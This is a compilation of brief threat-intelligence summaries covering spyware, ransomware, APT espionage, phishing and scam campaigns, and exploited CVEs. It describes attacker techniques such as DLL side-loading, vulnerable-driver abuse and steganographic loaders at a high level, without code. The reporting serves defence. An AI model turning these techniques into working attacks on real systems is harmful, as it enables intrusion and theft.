The report investigates Paragon Solutions, an Israeli spyware company founded in 2019 that sells a product called Graphite. Through infrastructure analysis, the researchers identified potential Paragon deployments in several countries. They also found evidence linking Paragon to the Canadian Ontario Provincial Police. Working with WhatsApp, they discovered and mitigated a Paragon zero-click exploit targeting civil society members. Forensic analysis of Android devices in Italy confirmed Paragon infections. The report also examines a potentially related iPhone spyware case. It highlights Paragon's targeting of individuals involved in migrant rescue operations in the Mediterranean, raising questions about the company's claims of only selling to customers respecting human rights. The findings challenge Paragon's marketing approach and demonstrate the ongoing risks of mercenary spyware abuse, even in democracies.

Dragon RaaS is a ransomware group that emerged in July 2024 as an offshoot of Stormous, part of a larger cybercrime syndicate known as 'The Five Families'. The group markets itself as a sophisticated Ransomware-as-a-Service operation but often conducts defacements and opportunistic attacks rather than large-scale ransomware extortion. Dragon RaaS primarily targets organizations in the US, Israel, UK, France, and Germany, exploiting vulnerabilities in web applications, using brute-force attacks, and leveraging stolen credentials. The group operates two ransomware strains: a Windows-focused encryptor based on StormCry and a PHP webshell. Despite claims of creating a unique ransomware variant, analysis reveals that Dragon RaaS's payloads are slightly modified versions of StormCry.

An exposed web server containing tools for an intrusion campaign targeting South Korean organizations was identified. The server hosted a Rust-compiled Windows executable delivering Cobalt Strike Cat, along with SQLMap, Web-SurvivalScan, and dirsearch. The threat actor used these tools to identify and exploit vulnerable web applications, targeting government and commercial entities. The campaign utilized a Rust-compiled loader with a modified version of Cobalt Strike, providing insight into the actor's malware delivery and post-exploitation techniques. Analysis revealed reconnaissance tools, SQL injection exploitation, and malware delivery components, with logs confirming beacon activity from compromised hosts. The attackers used MinGW- and Rust-compiled loaders to deploy Cobalt Strike Cat and Marte shellcode.

Chinese threat actor MirrorFace expanded its cyberespionage activities beyond Japan, targeting a Central European diplomatic institute in relation to Expo 2025. The group refreshed its tactics, introducing new tools like customized AsyncRAT and reviving the ANEL backdoor previously associated with APT10. MirrorFace employed spearphishing emails with malicious attachments or links to gain initial access. The attackers used legitimate applications to stealthily install malware, including ANEL, HiddenFace, and AsyncRAT. They also abused Visual Studio Code's remote tunnels feature for stealthy access. The campaign showcased complex execution chains and the use of Windows Sandbox to avoid detection. This operation provides evidence that MirrorFace is likely a subgroup under the APT10 umbrella.

A Windows .lnk file vulnerability, ZDI-CAN-25373, has been extensively exploited by state-sponsored and cybercriminal groups. The vulnerability allows hidden command execution through crafted shortcut files, exposing organizations to data theft and cyber espionage risks. Nearly 1,000 malicious .lnk files abusing this vulnerability have been identified, with APT groups from North Korea, Iran, Russia, and China involved in the attacks. Targeted sectors include government, finance, telecommunications, military, and energy across North America, Europe, Asia, South America, and Australia. The exploitation leverages hidden command line arguments within .lnk files, complicating detection. Organizations are urged to implement security measures and maintain vigilance against suspicious .lnk files.

A new security threat using the Legacy Driver Exploitation technique has been identified, focusing on remote system control via Gh0stRAT malware. The attack distributes malware through phishing and messaging apps, utilizing DLL side-loading for additional payloads. A modified TrueSight.sys driver bypasses Microsoft's driver blocking system, terminating security processes. The key vulnerability lies in TrueSight.sys versions 3.4.0 and below, exploited by the AVKiller tool. The attacker manipulated the WIN_CERTIFICATE structure's padding area to bypass certificate validation. Microsoft responded by updating the Vulnerable Driver Blocklist. This technique is related to the CVE-2013-3900 vulnerability, highlighting the importance of strengthening certificate validation.

A sophisticated malware campaign employs DLL side-loading to deliver a Python bot. The attack begins with a ZIP archive containing a legitimate PDF reader executable and a hidden malicious DLL. When executed, the malicious DLL is loaded instead of the intended Microsoft one, altering the PDF reader's behavior. The malware then unpacks a Python environment, fetches the bot code from a Bitbucket repository, and establishes persistence through registry modifications. The attacker uses various techniques to bypass security controls, including renaming processes and implementing a Byte Order Mark. The campaign demonstrates advanced evasion tactics and leverages trusted applications to deploy its payload.

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through drive-by downloads. Threat Actors compromise legitimate websites, injecting malicious JavaScript code that redirects users to convincing fake update pages for browsers like Chrome and Edge. These pages prompt users to download updates hosted on platforms such as Dropbox and OneDrive, which actually contain malware payloads. Notably, since late September, ClearFake has altered its code injection tactics, now utilizing smart contracts from the Binance Smart Chain.

Microsoft Incident Response researchers discovered a novel remote access trojan named StilachiRAT, demonstrating sophisticated evasion, persistence, and data exfiltration techniques. The malware collects extensive system information, targets cryptocurrency wallet extensions, steals browser credentials, establishes command-and-control communication, executes remote commands, achieves persistence through Windows services, monitors RDP sessions, collects clipboard data, and employs anti-forensic measures. StilachiRAT's capabilities include system reconnaissance, digital wallet targeting, credential theft, command execution, and clipboard monitoring. The analysis reveals its potential for cryptocurrency theft and system manipulation.

A sophisticated steganographic campaign has been observed distributing multiple stealer malware variants, including Remcos, DcRAT, AgentTesla, and VIPKeyLogger. The infection chain begins with a phishing email containing an Excel file that exploits CVE-2017-0199. This leads to the download of an HTA file, which in turn downloads a VBS script. The script retrieves a JPG file concealing base64-encoded malware. The payload is then injected into legitimate processes using process hollowing techniques. The campaign demonstrates advanced evasion methods and the potential to deploy various remote access trojans, highlighting the need for robust cybersecurity practices.

The article examines three unusual malware samples: a C++/CLI IIS backdoor enabling stealthy remote command execution, a bootkit leveraging the GRUB 2 bootloader to gain early system control and persistence, and a cross-platform post-exploitation framework developed in C++. These cases highlight evolving attacker techniques that prioritize stealth, persistence, and unconventional execution methods to evade detection.

The Akamai Security Intelligence and Response Team (SIRT) has identified a critical command injection vulnerability, CVE-2025-1316, in Edimax IC-7100 IP cameras. This flaw allows attackers to execute arbitrary commands remotely, leading to the integration of these devices into Mirai-based botnets. The vulnerability stems from improper neutralization of special elements in OS commands, enabling remote code execution through specially crafted requests. Despite detection efforts, Edimax has not provided patches, leaving affected devices exposed to ongoing exploitation.

Black Basta ransomware group has been using a previously unknown brute forcing framework called BRUTED since 2023. This framework automates internet scanning and credential stuffing against edge network devices, including firewalls and VPN solutions. The group targets high-impact industries, with Business Services being the most targeted sector. BRUTED enables Black Basta affiliates to scale attacks and expand their victim pool. The framework supports multiple vendors and technologies, using specialized brute-force logic for each platform. Black Basta's strategy involves exploiting edge network devices for initial access, then targeting ESXi hypervisors to maximize operational impact. The leak of internal chat logs has likely disrupted Black Basta's operations, but former members may reintegrate into other ransomware-as-a-service ecosystems.

A report details the incorporation of exploits targeting DrayTek Vigor routers into the Mirai botnet. Previously disclosed vulnerabilities affecting approximately 700,000 devices are being exploited, with attacks focusing on the 'keyPath' and 'cvmcfgupload' parameters. A curious spike in malformed exploit attempts, missing a dash in 'cgi-bin', has been observed. The attacks aim to upload and execute bot variants, primarily Mirai. The latest malformed exploit attempts to download a multi-architecture bash script and the actual bot. String analysis of the bot reveals attempts to exploit other vulnerabilities and likely includes a brute force component.

A sophisticated malware attack targeting WordPress WooCommerce sites was discovered, involving multiple components: a credit card skimmer, a hidden backdoor file manager, and a reconnaissance script. The attack focused on financial gain and long-term control. The skimmer, injected into the checkout page, collected payment and billing information, sending it to a malicious server. A PHP backdoor allowed remote system command execution, while a reconnaissance script gathered server information. The attack demonstrates the evolving complexity of e-commerce platform threats, emphasizing the need for strict security measures, regular scans, proper access controls, and timely updates to prevent such exploits.

A new ransomware operator, dubbed Mora_001, has been exploiting Fortinet firewall vulnerabilities CVE-2024-55591 and CVE-2025-24472 to gain unauthorized access and deploy a modified version of LockBit ransomware. The threat actor creates persistent admin accounts, exfiltrates firewall configurations, and uses VPN access for lateral movement. They selectively target file servers for encryption after data theft. The ransomware, named SuperBlack, uses LockBit's infrastructure but removes branding. The actor employs a custom VPN brute-forcing tool and leaves ransom notes linking to LockBit's Tox chat ID. This campaign highlights the increasing trend of exploiting perimeter security appliances and the evolving ransomware landscape.

This article examines three unique malware samples discovered in the past year. The first is a passive IIS backdoor written in C++/CLI, an uncommon language for malware. It has extensive functionality and appears professionally developed, possibly for targeted attacks. The second is a bootkit that installs a customized GRUB 2 bootloader to play Dixie through the PC speaker on boot. While sharing some characteristics with Equation Group malware, it's likely unrelated. The third is a new cross-platform post-exploitation framework called ProjectGeass, still in development. It has features like file management, keylogging, and payload execution. These samples demonstrate novel techniques being used by malware authors.

A phishing campaign is utilizing virtual hard disk (VHD) image files to deliver VenomRAT malware. The attack begins with a purchase order-themed email containing a ZIP archive with a VHD file. When opened, the VHD mounts as a drive and executes a heavily obfuscated batch script. This script employs PowerShell to perform malicious activities, including dropping files in the Startup folder for persistence, modifying registries, and connecting to Pastebin for C2 communication. The malware creates a DataLogs.conf file to capture keystrokes and sensitive data, which is then exfiltrated to the C2 server. The campaign also utilizes AES encryption and multiple layers of obfuscation to evade detection.

SocGholish, a malware-as-a-service framework, is being used to deploy RansomHub ransomware. It compromises legitimate websites, redirecting visitors to fake browser updates that deliver malicious payloads. The highly obfuscated JavaScript loader evades detection and executes various tasks, including reconnaissance, credential theft, and backdoor deployment. Water Scylla, the group behind this activity, collaborates with threat actors operating rogue Keitaro TDS instances for payload distribution. The attack chain involves multiple stages, from initial access to ransomware deployment. SocGholish's versatile loader can download and execute malicious payloads, exfiltrate data, and execute arbitrary commands. Recent detections show high activity in the US, primarily targeting government organizations.

Cybercriminals are exploiting Ramadan's spirit of generosity through various scams targeting unsuspecting individuals. These include wallet-draining schemes disguised as religious incentives, fraudulent crypto tokens, fake e-commerce sales, and deceptive donation campaigns. Scammers utilize social media verification badges, AI-generated promotions, and psychological manipulation to lure victims. The scams range from 'earn while you worship' programs to fake data pack giveaways and counterfeit product listings. The rise of Ramadan-themed tokens on cryptocurrency platforms highlights the need for increased regulation. Victims are often tricked into connecting their crypto wallets or sharing personal information, leading to financial losses and potential identity theft.

This analysis emphasizes the importance of addressing old vulnerabilities in software systems globally. It highlights the end of Windows 10 support in October 2025 and the risks associated with unpatched systems. The article discusses the relevance of vulnerabilities regardless of geographic location, citing examples like Log4j and NotPetya. It also mentions a recent CVE (CVE-2025-22224) that affected over 40,000 instances globally within a week of discovery. The article stresses the need for regular software updates and patching, regardless of nationality or location, to maintain robust cybersecurity.

A large-scale affiliate marketing campaign has been uncovered, utilizing AI-generated content, automation, fake social media accounts, and Black Hat SEO to manipulate search rankings and drive traffic to iGaming and VPN promotions. The operation involves thousands of subdomains, redirection chains, and fake social media accounts across multiple platforms. The campaign aligns with high-traffic events and seasonal promotions, exploiting affiliate programs like 7StarPartners and NordVPN. It employs sophisticated SEO manipulation techniques and AI-generated content in multiple languages to maximize visibility and engagement. The fraudulent activities undermine market integrity, consumer trust, and legitimate businesses' visibility while compromising the reliability of affiliate programs.

A phishing campaign targeting the hospitality industry impersonates Booking.com to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, uses a social engineering technique called ClickFix to trick users into downloading malicious payloads. Targets are sent emails with links to fake Booking.com pages, which prompt users to execute commands that download malware. The campaign delivers various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Organizations in North America, Oceania, Asia, and Europe are targeted. The threat actor's evolving tactics demonstrate attempts to bypass conventional security measures.

Head Mare and Twelve, two hacktivist groups, have launched joint attacks on Russian companies. Head Mare has expanded its toolkit, now using tools previously associated only with Twelve, such as the CobInt backdoor. The attackers gained initial access through phishing emails and compromised contractors. They used various tools for reconnaissance, privilege escalation, lateral movement, and data exfiltration. The final goal was file encryption using LockBit 3.0 and Babuk ransomware. Overlaps in infrastructure, tactics, and tools suggest collaboration between the two groups. The attacks primarily targeted manufacturing, government, and energy sectors in Russia.

A campaign distributing thousands of fraudulent cryptocurrency investment platforms via websites and mobile applications has been uncovered. The operation impersonates well-known brands and organizations, luring victims with unrealistic promises of high returns. The consistent design of the platforms suggests the use of a standardized toolkit for large-scale development. Domains are primarily registered in Singapore using lenient registrars and fake names. The scam targets users in East African and Asian countries, utilizing Telegram channels for engagement. The platforms operate like Ponzi schemes, encouraging user recruitment through multi-level affiliate programs. Evidence points to a single threat actor behind the campaign, given the consistent registration patterns and infrastructure use.

This analysis showcases the use of Power BI to examine file hash data from a DShield SIEM over a 60-day period. The process involved exporting data from Elastic Discover, importing it into Power BI, and creating visualizations for analysis. Key findings include the identification of an IP address (87.120.113.231) associated with RedTail malware, uploading six different files with multiple hashes. The analysis also revealed the reappearance of a previously identified Linux Trojan (Xorddos) from new IP addresses within the same subnet. Additionally, two strange filenames were discovered and investigated, with one identified as an IRCBot through VirusTotal. This method of large dataset analysis proves valuable in uncovering potentially overlooked or lost data through retrospective examination.

The GrassCall malware campaign, orchestrated by the Russian-speaking cybercriminal group 'Crazy Evil,' targets job seekers in the cryptocurrency and Web3 sectors. The attackers create fake companies and job postings, luring victims into downloading malicious software disguised as a video conferencing application. This sophisticated social engineering attack deploys Remote Access Trojans and information-stealing programs like Rhadamanthys for Windows users and Atomic macOS Stealer for Mac users. The campaign aims to compromise systems and steal cryptocurrency assets, with hundreds of people already affected. The infection chain involves impersonation, phishing communication, and malware deployment, showcasing the group's advanced tactics in identity fraud and cryptocurrency theft.

Threat actors are increasingly using legitimate remote monitoring and management (RMM) tools as initial payloads in email campaigns. This trend aligns with a decrease in the use of traditional loaders and botnets by initial access brokers. RMMs can be exploited for data collection, financial theft, lateral movement, and installing additional malware. Notable RMM tools observed in campaigns include ScreenConnect, Fleetdeck, and Atera. The shift towards RMM usage coincides with law enforcement disruptions of major malware families and a decline in ransomware payments. Specific threat actors like TA583 and TA2725 have been observed incorporating RMMs into their attack strategies. Organizations are advised to restrict unauthorized RMM installations, implement network detections, and train users to identify suspicious activity.

Researchers have identified a cluster of JSPSpy web shell servers featuring 'Filebroser', a modified version of the open-source File Browser project. The infrastructure spans multiple hosting providers in China and the United States, using both cloud services and traditional ISPs. JSPSpy, a Java-based web shell first observed in 2013, has been used by various threat actors, including the Lazarus Group. The servers typically host JSPSpy on port 80, with one instance on port 8888. Two servers also host the 'filebroser' login panel on port 8001. Detection strategies for JSPSpy include analyzing login page titles and HTTP response headers. The presence of 'filebroser' alongside JSPSpy raises questions about its purpose in attack operations.

China-nexus espionage group UNC3886 has been discovered deploying custom backdoors on Juniper Networks' Junos OS routers. The attackers used TINYSHELL-based backdoors with varying capabilities, including active and passive functions, and an embedded script to disable logging. The group demonstrated advanced knowledge of system internals and focused on maintaining long-term access while minimizing detection risk. UNC3886 targeted defense, technology, and telecommunication organizations in the US and Asia, leveraging legitimate credentials for initial access. The malware ecosystem included six distinct samples, each with unique features for bypassing security measures and maintaining persistence. The activity highlights the ongoing trend of targeting networking infrastructure for espionage purposes.

APT37, a North Korean state-sponsored hacking group, has expanded its operations to target users on Windows and Android platforms through phishing campaigns. The group's attack vector involves malicious LNK files distributed via group chat platforms. The infection process begins with phishing emails containing ZIP attachments that conceal malicious LNK files. When executed, these files initiate a multi-stage attack using batch scripts and PowerShell, ultimately deploying RokRat as the final payload. RokRat, a remote access Trojan, collects detailed system information, abuses cloud services for command and control, and employs anti-analysis techniques. It can execute remote commands, exfiltrate data, and perform various malicious activities on infected systems.

Cybercriminals impersonating a real company are sending fake job descriptions to employees of targeted organizations. The attackers, known as Squid Werewolf, are offering substantial sums of money, potentially hundreds of thousands of rubles, in exchange for sensitive information. This sophisticated phishing campaign aims to exploit the trust associated with legitimate recruitment processes to gather confidential data from unsuspecting employees. The operation demonstrates the evolving tactics of cyber espionage groups, blending social engineering with financial incentives to compromise organizational security.

A new attack campaign targeting interactive computing environments like Jupyter Notebooks has been discovered. The attack involves downloading a compressed file from a remote server, which, when executed, deploys multiple malicious tools to exploit the server and establish persistence. The campaign poses a significant risk to cloud-native environments by enabling unauthorized access and long-term control over compromised systems. The attack flow includes initial access through an unauthenticated JupyterLab instance, downloading and extracting malicious files, executing scripts to launch additional binaries, and establishing persistence while evading detection. The malware deploys cryptominers and attempts to kill competing processes. Runtime protection solutions can effectively detect, block, and mitigate these threats using real-time threat intelligence, malware scanning, and customizable policies.

Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated macOS malware that infects Xcode projects. This latest version features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. The malware steals and exfiltrates files, system information, and user data, including digital wallet information and notes. It uses a modular approach with encoded payloads, improved error handling, and heavy use of scripting languages and legitimate binaries. The malware's infection chain consists of four stages, with the fourth stage running various sub-routines. Notable capabilities include three distinct persistence techniques and a new infection method for Xcode projects. The malware's command-and-control server is active and downloading additional modules.

An email campaign impersonating Binance is offering fake TRUMP coins to lure victims into downloading a malicious 'Binance Desktop' application, which actually installs ConnectWise RAT. The attackers have created a convincing web page mimicking Binance's interface to host the malware download. Once infected, threat actors quickly establish remote control of the victim's computer, targeting saved passwords in applications like Microsoft Edge. The campaign employs sophisticated social engineering tactics, including sender name spoofing and risk warnings, to appear legitimate. Threat actors are actively monitoring infections and can connect to compromised systems within minutes of installation.

A malicious campaign targeting residents of Middle East and North Africa has been discovered, active since September 2024. The attackers create fake news groups on social media and publish posts with links to file-sharing services or Telegram channels containing modified AsyncRAT malware. The malware is designed to search for crypto wallets and interact with a Telegram bot. The most targeted countries include Egypt, Libya, UAE, Russia, Saudi Arabia, and Turkey. The attack chain involves multiple stages, including the use of PowerShell scripts and a reflective loader written in C#. The AsyncRAT modification includes an offline keylogger and collects information about crypto wallet extensions and software. The campaign has affected approximately 900 victims from various countries, including employees of companies in oil extraction, construction, IT, and agriculture sectors.

A watering hole attack targeting unification education program applicants has been discovered. The attackers uploaded malicious HWP document files to a notice board for an educational program. When opened, the file executes hidden malicious code through OLE objects. The malware creates persistence using scheduled tasks, downloads additional payloads, and communicates with a command and control server. Based on the techniques used, the attack is attributed to the North Korean Kimsuky group. Users are advised to exercise caution when downloading application forms from such websites.

The Lazarus group has been targeting Windows web servers, particularly in South Korea, installing webshells and C2 scripts to use compromised servers as proxies. The attacks involve multiple stages, including the use of LazarLoader malware and privilege escalation tools. The C2 scripts act as proxies between the malware and secondary C2 servers. Various webshells were identified, including RedHat Hacker and custom ASP shells. The LazarLoader downloader was used to fetch additional payloads, while a privilege escalation tool exploited UAC bypass techniques. The attackers aim to establish persistence and gain elevated access on compromised systems.

Akira, a prominent ransomware group, accounted for 15% of incidents in 2024, showcasing novel evasion techniques. In a recent attack, Akira circumvented an Endpoint Detection and Response (EDR) tool by compromising an unsecured webcam to deploy ransomware. After initial detection, the group pivoted to exploit IoT devices, particularly a vulnerable webcam running Linux. This allowed them to execute their Linux ransomware variant without EDR interference. The incident highlights the importance of comprehensive security measures, including IoT device monitoring, network segmentation, and regular audits. Key takeaways include prioritizing patch management for all devices, adapting to evolving threat actor tactics, and ensuring proper EDR implementation.

Strela Stealer is an infostealer targeting email clients in specific European countries. It exfiltrates login credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily affecting Spain, Italy, Germany, and Ukraine. Recent campaigns involve forwarding legitimate emails with malicious attachments. Strela Stealer employs custom obfuscation techniques and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific language regions. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure used by Strela Stealer is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.

A campaign targeting ISP infrastructure providers on the West Coast of the United States and China has been identified. Originating from Eastern Europe, the attackers use simple tools to abuse victims' computer processing power for cryptomining and credential theft. The initial access is gained through brute force attacks using weak credentials. The malware has diverse functions including data exfiltration, additional crimeware deployment, self-termination to avoid detection, persistence establishment, remote access disabling, and pivot attacks to targeted CIDRs. The actors perform minimal intrusive operations, relying on scripting languages and API calls for C2 operations. The campaign specifically targets ISP infrastructure, likely for cryptomining purposes.

A campaign using fake GitHub repositories to distribute SmartLoader and Lumma Stealer malware has been uncovered. The attackers create convincing repositories using AI-generated content to deceive users into downloading malicious files disguised as gaming cheats, cracked software, and system tools. The malware is delivered through obfuscated Lua scripts in ZIP files, exploiting GitHub's trusted reputation to evade detection. Upon execution, SmartLoader facilitates the delivery of Lumma Stealer, which can steal sensitive information like cryptocurrency wallets, 2FA extensions, and login credentials. This campaign demonstrates the evolving tactics of cybercriminals, adapting from using GitHub file attachments to creating entire repositories with AI-assisted deception.

FortiGuard Labs has analyzed malicious software packages detected from November 2024 to March 2025, revealing various attack techniques used to exploit system vulnerabilities. Key findings include 1,082 packages with low file counts, 1,052 packages with suspicious install scripts, and 1,043 packages lacking repository URLs. Attackers employ methods such as obfuscation, command overwrite, and typosquatting to bypass security measures. The analysis highlights the use of suspicious APIs, URLs, and installation scripts to exfiltrate data, establish backdoors, and perform remote control activities. Specific cases involve malicious Python and Node.js packages targeting developers and harvesting sensitive information. The report emphasizes the importance of robust detection strategies and proactive defense measures to mitigate these evolving cybersecurity threats.

Check Point Research uncovered ongoing campaigns by Blind Eagle targeting Colombian institutions since November 2024. The group exploits a variant of CVE-2024-43451, using malicious .url files to deliver malware. Their attack chain includes HeartCrypt-packed executables, a .NET RAT, and Remcos RAT as the final payload. The campaigns have high infection rates, with over 1,600 victims in a single operation. Blind Eagle utilizes legitimate platforms like Google Drive and GitHub for malware distribution. The group's operating timezone suggests South American origins. An operational failure revealed past phishing activities targeting Colombian banks, resulting in over 8,000 stolen PII entries.

A massive SMS phishing campaign targeting U.S. drivers exploits various toll systems, including E-ZPass, SunPass, and TxTag. The scam uses fake payment alerts sent via iMessage and SMS from foreign numbers to lure victims to fraudulent websites. Analysis reveals a pattern in domain names and infrastructure, with most phishing sites hosted on Chinese ASNs like Tencent and Alibaba Cloud. The campaign employs nginx web servers and constantly shifts tactics to evade detection. Over 2,000 complaints have been filed with the FBI's Internet Crime Complaint Center, prompting warnings from the FTC and toll authorities. The scam's effectiveness stems from the inconsistency in legitimate toll collection domain names, making it challenging for users to distinguish between real and fake websites.

The SideWinder APT group intensified its activities in the second half of 2024, targeting maritime infrastructures, logistics companies, and nuclear sectors across Asia, the Middle East, and Africa. The group updated its toolset, including improvements to its RTF exploit, JavaScript loader, and Backdoor Loader. SideWinder's infection chain begins with spear-phishing emails containing malicious DOCX files, exploiting CVE-2017-11882 to deliver a multi-stage payload. The group demonstrated agility in evading detection, often updating their tools within hours of being identified. Notable targets included government entities, military installations, and diplomatic missions, with an increased focus on maritime and nuclear-related organizations.

This analysis explores the evolution of Russian state-backed cyber actors and their operations. It highlights the activities of several prominent groups, including UNC2589, APT44 (Sandworm), APT29, and APT28. These actors, associated with various Russian intelligence agencies, have been involved in global espionage, sabotage, and influence operations. The report details their targets, which include government organizations, critical infrastructure, and diplomatic entities across multiple countries. It also describes the groups' adaptation to new security measures and their use of advanced techniques such as zero-day exploits, social engineering, and living off the land tactics. The analysis emphasizes the importance of understanding these actors' methods for improving global cybersecurity resilience.

A recent investigation uncovered a malicious JavaScript injection affecting WordPress websites, redirecting visitors to unwanted third-party domains. The attack vector involves a two-stage redirection process, injecting code into theme files and loading external scripts. The malware creates hidden elements to force redirects, potentially leading to phishing pages, malvertising, exploit kits, or scam sites. At least 31 infected websites were identified, with domains like awards2today[.]top and chilsihooveek[.]net involved. The infection methods include compromised admin accounts, exploited vulnerabilities, inadequate file permissions, and hidden PHP backdoors. Impacts include traffic loss, reputation damage, SEO blacklisting, and risks of further infections. Detection involves inspecting network activity and file modifications, while prevention measures include regular security audits, updates, strong passwords, and web application firewalls.

A large-scale malvertising campaign impacting nearly one million devices globally was detected in December 2024. The attack originated from illegal streaming websites with embedded malvertising redirectors, leading users through multiple redirections to malware hosted on GitHub and other platforms. The multi-stage attack chain involved deploying information stealers like Lumma and Doenerium, as well as remote access tools. The threat actors used living-off-the-land techniques and various scripts to collect system information, exfiltrate data, and establish persistence. The campaign affected both consumer and enterprise devices across multiple industries, highlighting its indiscriminate nature.

Medusa ransomware attacks jumped by 42% between 2023 and 2024. This increase in activity continues to escalate, with almost twice as many Medusa attacks observed in January and February 2025 as in the first two months of 2024.

The GrassCall malware campaign is an advanced social engineering attack conducted by a Russian-speaking cybercriminal group called Crazy Evil. Targeting job seekers in the cryptocurrency and Web3 sectors, the campaign uses fake job interviews to compromise victims' systems and steal cryptocurrency assets. The attackers create a fake company, post job advertisements on reputable platforms, and guide candidates through a sophisticated process involving phishing emails, Telegram conversations, and the installation of malicious software disguised as a video conferencing application. The malware deployed includes a Remote Access Trojan (RAT) and information-stealing programs like Rhadamanthys for Windows users, and the Atomic macOS Stealer (AMOS) for Mac users. The campaign has affected hundreds of people, with some victims reporting drained cryptocurrency wallets.

An unknown attacker has been targeting organizations in Japan since January 2025, exploiting CVE-2024-4577, a remote code execution vulnerability in PHP-CGI on Windows. The attacker uses the Cobalt Strike kit 'TaoWu' for post-exploitation activities, including reconnaissance, privilege escalation, persistence establishment, and credential theft. Targeted sectors include technology, telecommunications, entertainment, education, and e-commerce. The attack involves exploiting the vulnerability, executing PowerShell scripts, and using various tools for system compromise. The attacker's techniques are similar to those of the 'Dark Cloud Shield' group, but attribution remains uncertain. A pre-configured installer script found on the C2 server deploys multiple adversarial tools and frameworks, indicating potential for future attacks.

HUMAN's Satori Threat Intelligence team uncovered and partially disrupted BADBOX 2.0, a complex fraud operation targeting low-cost consumer devices. This operation, an expansion of the 2023 BADBOX scheme, infected over 1 million Android Open Source Project devices worldwide with a backdoor called BB2DOOR. The infection enabled various fraud schemes, including residential proxy services, ad fraud, and click fraud. Four threat actor groups were identified: SalesTracker Group, MoYu Group, Lemon Group, and LongTV. The operation targeted devices in 222 countries, with Brazil being the most affected. HUMAN collaborated with Google and other partners to disrupt the infrastructure and protect customers from the threat.

This investigation uncovers a massive criminal operation known as 'PrintSteal' that generates and distributes fake Indian KYC documents. The scheme involves over 1,800 fraudulent domains impersonating government websites, with at least 2,727 registered operators on one platform alone. Over 167,000 fake documents have been created, including birth certificates, Aadhaar cards, and PAN cards. The operation uses a network of affiliates, illicit APIs, and encrypted communication channels. Financial analysis shows an estimated 40 Lakhs in revenue from a single platform. The widespread nature of this fraud poses significant risks to India's digital security, financial systems, and public trust in government services.

Cybercriminals are exploiting the popularity of DeepSeek, a powerful reasoning large language model, by creating fake websites that mimic the official DeepSeek chatbot site and distribute malicious code disguised as a client. Three main schemes were identified: a Python stealer targeting user data and credentials, a malicious script spreading through social media posts, and backdoors targeting Chinese users. The attacks use various methods to lure victims, including typosquatting and ad traffic. Users are advised to carefully check website addresses and be cautious of unverified links, especially for popular services. The malware distributed includes stealers, backdoors, and trojans, potentially leading to data theft and remote access to victims' computers.

A new campaign leveraging newly registered domains (NRDs) and a novel variant of domain generation algorithms (DGAs) has been uncovered. The campaign used over 6,000 NRDs redirecting to domains resembling dictionary-based DGAs. These NRDs led to advertisements of potentially unwanted Android applications. Further investigation revealed 444,898 NRDs belonging to the same actor, redirecting to 178 domains exhibiting 'typo DGA' characteristics. This new pattern combines dictionary words with typographical errors, potentially designed to evade traditional detection methods. The campaign utilized shared WHOIS information, hosting infrastructure, and epoch timestamp subdomains for redirections. The findings highlight the need for advanced detection capabilities to combat evolving malicious techniques.

Attacks using the Poco RAT are a continuation of the Dark Caracal group's campaign. This campaign was launched in 2022 and is aimed at Spanish-speaking countries in Latin America.

A new botnet that infects tens of thousands of internet-connected devices has been identified as being linked to Iran, according to research by GreyNoise and Nokia Deepfield. and Censys.

This analysis explores the use of traffic distribution systems (TDS) by threat actors to redirect network traffic for illicit purposes like phishing and malvertising. TDS act as central hubs, obfuscating final destinations and hindering detection. The study found that malicious TDS exhibit distinct topological characteristics compared to benign networks, including longer redirection chains, more URLs, and higher connectivity. Using these insights, a machine learning-based detection system was developed to identify various types of malicious TDS infrastructure. The research also presents case studies of TDS usage in phishing campaigns, malvertising, darknet services, and cloaking techniques.

An advanced malware framework known as Winos4.0 was used to target companies in Taiwan in January 2025.

Spur Engineering is releasing a comprehensive list of IP addresses associated with the Astrill VPN service to help companies protect against fraud and abuse from the Democratic Republic of Korea (DPRK) in the future.

This week, the SonicWall threat research team discovered a new update in the Remcos infection chain aimed at enhancing its stealth by patching AMSI scanning and ETW logging to evade detection. This loader was seen distributing Async RAT in the past but now it has extended its functionality to Remcos RAT and other malware families. From our analysis, it seems to be targeting European institutions.

A mass malware campaign is infecting users with a cryptocurrency miner disguised as a tool for bypassing internet restrictions. The campaign has affected over 2,000 victims in Russia, utilizing YouTube channels to spread malicious links. Attackers are blackmailing content creators to post videos with infected file links, threatening channel shutdowns. The malware uses a multi-stage infection process, including a Python loader that downloads and executes the SilentCryptoMiner. This miner, based on XMRig, employs stealth techniques like process hollowing and can mine various cryptocurrencies. The campaign highlights the growing exploitation of restriction bypass tools for malware distribution, posing significant risks to user data security.

A highly targeted email-based campaign was identified, focusing on aviation and satellite communications organizations in the United Arab Emirates. The campaign utilized a compromised entity to send customized malicious messages, leading to the discovery of a new backdoor named Sosano. This malware employed various obfuscation techniques, including polyglot files, indicating a sophisticated adversary. The infection chain involved multiple stages, using LNK files, HTA scripts, and XOR encoding. The Sosano backdoor, written in Golang, contains limited functionality but is heavily obfuscated. The threat actor, tracked as UNK_CraftyCamel, shows possible connections to Iranian-aligned adversaries but is considered a separate entity. This campaign highlights the use of trusted relationships to deliver customized, obfuscated malware to selective targets.

A threat group impersonating the Electronic Frontier Foundation (EFF) is targeting Albion Online players through phishing messages and decoy documents. The campaign uses malware such as Stealc stealer and Pyramid C2 to compromise player accounts. Analysis of an exposed directory revealed PowerShell scripts, PDFs, and malicious payloads. The infrastructure includes multiple servers sharing SSH keys. Code comments suggest Russian-speaking developers. The attackers use EFF's reputation to lend credibility while executing malware in the background. The campaign exploits the game's player-driven economy, where in-game assets have real-world value. Mitigation strategies include cautious handling of unsolicited communications and verifying sources' authenticity.

